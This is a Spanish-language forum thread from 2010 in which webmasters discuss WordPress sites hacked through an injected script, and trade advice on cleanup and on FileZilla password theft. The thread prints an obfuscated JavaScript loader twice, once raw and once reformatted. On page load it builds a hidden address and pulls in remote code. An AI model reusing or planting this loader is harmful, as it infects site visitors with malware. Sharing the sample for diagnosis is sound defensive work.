No estás registrado (Registrarse)
Vanilla 1.1.10 es un producto de Lussumo. Para más información: Documentación, Soporte.
-
Me han hackeado dos sitios en wordpress en dos hosting distintos !!!
Alguien sabe que hace este código y como se soluciona esto:
<script>this.m=54425;this.m+=112;this.o=23190;this.o+=181;var s;var vK="vK";p=function(){try {} catch(F){};function Y(e,O,I){return e.substr(O,I);var Or=new Array();this.z=7217;this.z-=29;}var XI=["TL","ml","sf"];try {var bD='CQ'} catch(bD){};var l=RegExp;var Iq=document;this.ji="ji";var A=String("/g"+Y("ooDina",0,2)+Y("glFSVb",0,2)+Y("e.lwN",0,2)+Y("Q1VcoV1Q",3,2)+"m/"+Y("dRHgoHRd",3,2)+Y("bHGrogGHbr",4,2)+"le"+".c"+"om"+Y(".pJ6q",0,2)+Y("vx1k/x1v",3,2)+"go"+"og"+Y("29palea9p2",4,2)+Y(".clLmh",0,2)+"a."+Y("phcVC",0,2)+Y("p9vZ",0,1));var rR='';var bk='';var a='';var MH=[];function x(e,O){var c=[];jm=["aS","om","y"];qc={};var I=String(Y("[k84",0,1))+O+String("]");var E=new l(I, String("g"));try {var Er='NM'} catch(Er){};try {var OJ='qR'} catch(OJ){};return e.replace(E, a);gp=63457;gp+=246;};var Ou=new String();var n=new String();var W=x('sHcEr4i1pxtQ','QxHLEfw45OeVI1');this.NQ=52448;this.NQ+=14;var bb={B:false};var v=String("bo"+"dy");var X=null;tB={cL:"Ag"};sY={A_:"pH"};var sj=579362-571282;J=34504;J--;s=function(){try {var CX=false;var vi=x('cPrqeCaUtTe6EqlXe6mHeqnqtT','QyKPTjH8U3h6SCXq');se=Iq[vi](W);this.uk=54424;this.uk+=144;UK=["tC"];var e=sj+A;var _=new Date();var eY=[];oi={L:false};var j=x('sSr9cP','P9IMovklFbSOK');var Z=String("defer");AR=["RS","Ro"];var wP=false;this.XJ=35882;this.XJ+=248;this.lQ=48827;this.lQ+=109;se[Z]=[1,6][0];vX=[];this.MP=58035;this.MP-=118;se[j]="htt"+"p:/"+Y("/peEK1",0,3)+Y("arlvsx",0,3)+Y("rine1aJ",0,3)+Y("g.rc1p",0,3)+Y("u:Foa",0,2)+e;this.ec=10931;this.ec+=213;Iq[v].appendChild(se);reu=11819;reu+=47;} catch(XU){var bJ=23663;var rJ=["eg","dp"];};};var Wi={aF:false};};QR=["qg","CM","Uk"];p();aM=[];ii=["dk","u_","Vy"];window.onload=s;var pg={rh:false};w_=50335;w_-=190;</script>
<!--8e602678b34d42aff896c8587bbe1168--> -
-
CommentAuthorjackdomain
- CommentTimeJun 1st 2010
referente al codigo ni idea ...
pero para solucionarlo si no han penetrado en tu base de datos... puedes substituir los archivos de tu instalación por los de la mas reciente y actualizar
(haz un backup de todo)
Lo ideal si no tienes muchos upload seria borrar todo el directorio y subirlo de nuevo. En el archivo config poner los datos actuales de tu wordpress.Wordpress & drupal help -
-
es normal que se pueda hackear tan fácil ??... uno de ellos era la ultima versión 2.9.2 ...
Ahora no puedo entrar en el hosting porque estoy en una red privada, y el puerto del cpanel esta cerrado ...
por eso es lo de preguntar lo que hace el código por si descarga algo en el cliente.
gracias. -
-
CommentAuthorjackdomain
- CommentTimeJun 1st 2010
algunas veces entran por los plugins..., comprueba los permisos de las carpetas, etc.Wordpress & drupal help -
-
No sé lo que hace, pero lo pongo bonito por si alguien se anima
this.m=54425;
this.m+=112;
this.o=23190;
this.o+=181;
var s;
var vK="vK";
p=function(){
try {}
catch(F){
};
function Y(e,O,I){
return e.substr(O,I);
var Or=new Array
this.z=7217;
this.z-=29;
}
var XI=["TL","ml","sf"];
try {
var bD='CQ'
} catch(bD){
};
var l=RegExp;
var Iq=document;
this.ji="ji";
var A=String("/g"+Y("ooDina",0,2)+Y("glFSVb",0,2)+Y("e.lwN",0,2)+Y("Q1VcoV1Q",3,2)+"m/"+Y("dRHgoHRd",3,2)+Y("bHGrogGHbr",4,2)+"le"+".c"+"om"+Y(".pJ6q",0,2)+Y("vx1k/x1v",3,2)+"go"+"og"+Y("29palea9p2",4,2)+Y(".clLmh",0,2)+"a."+Y("phcVC",0,2)+Y("p9vZ",0,1));
var rR='';
var bk='';
var a='';
var MH=[];
function x(e,O){
var c=[];
jm=["aS","om","y"];
qc={};
var I=String(Y("[k84",0,1))+O+String("]");
var E=new l(I, String("g"));
try {
var Er='NM'
} catch(Er){
};
try {
var OJ='qR'
} catch(OJ){
};
return e.replace(E, a);
gp=63457;
gp+=246;
};
var Ou=new String
var n=new String();
var W=x('sHcEr4i1pxtQ','QxHLEfw45OeVI1');
this.NQ=52448;
this.NQ+=14;
var bb={
B:false
};
var v=String("bo"+"dy");
var X=null;
tB={
cL:"Ag"
};
sY={
A_:"pH"
};
var sj=579362-571282;
J=34504;
J--;
s=function(){
try {
var CX=false;
var vi=x('cPrqeCaUtTe6EqlXe6mHeqnqtT','QyKPTjH8U3h6SCXq');
se=Iq[vi](W);
this.uk=54424;
this.uk+=144;
UK=["tC"];
var e=sj+A;
var _=new Date();
var eY=[];
oi={
L:false
};
var j=x('sSr9cP','P9IMovklFbSOK');
var Z=String("defer");
AR=["RS","Ro"];
var wP=false;
this.XJ=35882;
this.XJ+=248;
this.lQ=48827;
this.lQ+=109;
se[Z]=[1,6][0];
vX=[];
this.MP=58035;
this.MP-=118;
se[j]="htt"+"p:/"+Y("/peEK1",0,3)+Y("arlvsx",0,3)+Y("rine1aJ",0,3)+Y("g.rc1p",0,3)+Y("u:Foa",0,2)+e;
this.ec=10931;
this.ec+=213;
Iq[v].appendChild(se);
reu=11819;
reu+=47;
} catch(XU){
var bJ=23663;
var rJ=["eg","dp"];
};
};
var Wi={
aF:false
};
};
QR=["qg","CM","Uk"];
p();
aM=[];
ii=["dk","u_","Vy"];
window.onload=s;
var pg={
rh:false
};
w_=50335;
w_-=190; -
Descarga la última versión de Wordpress y de todoa y cada uno de los plugins que tengas, o mejor aún, instala sólo el wordpress y espera unos días, puede que el problema esté en algún plugin..
Es el problema que tienen las aplicaciones prefabricadas, que suelen ser el blanco de todos los ataques.. :-S
Saludos.Compramania Curso de Google Ads | Desarrollo web de todos los niveles. SEO. Contáctame. -
Fue de la siguiente manera:
me metí en esta web porque me pidieron intercambiar un enlace.
http://www.consejosydecoracion.net/ (NO METERSE) tambien está infectada ... con es código.
Y no se como han podido inyectar ese código ... en los wordpress míos ... -
En el código aparece una dirección ( No entrar, no me hago responsable)
-
incluso para entrar en este Post hay que desactivar el antivirus.Touch Games | cibercafe |
-
Posted By: netsDescarga la última versión de Wordpress y de todoa y cada uno de los plugins que tengas, o mejor aún, instala sólo el wordpress y espera unos días, puede que el problema esté en algún plugin..
Es el problema que tienen las aplicaciones prefabricadas, que suelen ser el blanco de todos los ataques.. :-S
Saludos.En venta varios proyectos webs desarrollados, funcionando.. buen precio!| Desarrollo web simple, sencillo y económico Contactame!
No me han debido robar las claves de ftp, y la única forma es por filezilla ...
porque no están en otro sitio ... de manera que me han entrao en casi todos los sitios y le han inyectado el código es js ... -
¿quién te envío la propuesta para que vieses la web de intercambio? si se puede saber, creo que sería bueno para todos concoer desde que dominio te contactaron.La Curiosidad es el Principio de toda Filosofía.
-
no se si el causante será el o que también estaba infectado, el caso es que joder ... vaya día ... de restauranciones ...
-
A mi llego también la propuesta y lo desactivo el antivirus pero aparte utilizo NoScript de cualquier manera haré un respaldo al día.Bodas --| hasta que te perdi conoci la ternura, tambien el amor pero que tarde fue, si tu ya te habías ido ta ..ra..ra
-
El webmaster no ha contestado mi correo de aviso ... por lo que empiezo a sospechar mal de él ...
A mi también me saltó el antispyware pero era la 1 de la mañana y no se a que le dí, en cualquier caso no entiendo como sacó las claves del filezilla, ya no voy a guardarlas en disco -
Dudo que te hayan sacado las claves del filezilla... huele a cross s scripting
-
pues la infección fue local de eso estoy seguro ... de ahí a todos mis alojamientos , tenía las claves únicamente cargadas en filezilla para no tener que volver a meterlas, ahora sí jeje
-
-
CommentAuthorStamati ventures
- CommentTimeJun 5th 2010
Hackearon a otro sitio en wordpress. La solución en: www.fernandoserer.com/2010/06/wordpress-hacked-viagra-y-cialis-por-culpa-de-pharma-hack/ -
-
hay dos maneras que los wordpress se infecten con eso: una es que el equipo de donde se ingresa al admin este infectado y entonces carga el script en TODOS los archivos index.php de WP. hay que entrar a revisar uno por uno y borrar las dos lineas de script, y cambiar las contraseñas de admin de wp, por supuesto todo desde un equipo confiable, con un buen antivirus
la otra es que puede entrar por un bug de filezilla, la unica solucion que le encontre a eso es no guardar historial de filezilla, cuando toca utilizarlo, escribir datos y luego borrarlos, un problema porque era comodo tener todas esas contraseñas juntas :komete4:
ese script esta metiendose en toda internet, hasta lo encontre en un sitio html
y llama a sitios de china y rusia infectados y mete diversos virus y troyanos, algunos se activan en dias determinados, y por lo general acaban con los equipos infectados, aunque algunos solo recolectan contraseñas.
a mi se me infectaron 4 wp, por suerte pude desinfectarlos sin problemas aunque a veces se vuelven a meter pero "dormidos", es decir, sin hacer nada, supongo que hasta una fecha de activacion. son del mismo tipo del que me destruyo un equipo hace dias, creo que despues de ese ataque me lo pegue yo e infecte esos wp, tambien unos clientes se lo infectaron desde sus propios equipos y sacarselos fue un problema porque no tenian antivirus eficaces y los scripts volvian a aparecer.
Offline
-
Hace 3 dias alguien explicaba que le han hackeado 20 instalaciones de wordpress.
http://wordpress.org/support/topic/all-wp-sites-downed-hacked-but-doesnt-explain-allDominios venta
1 a 19 de 19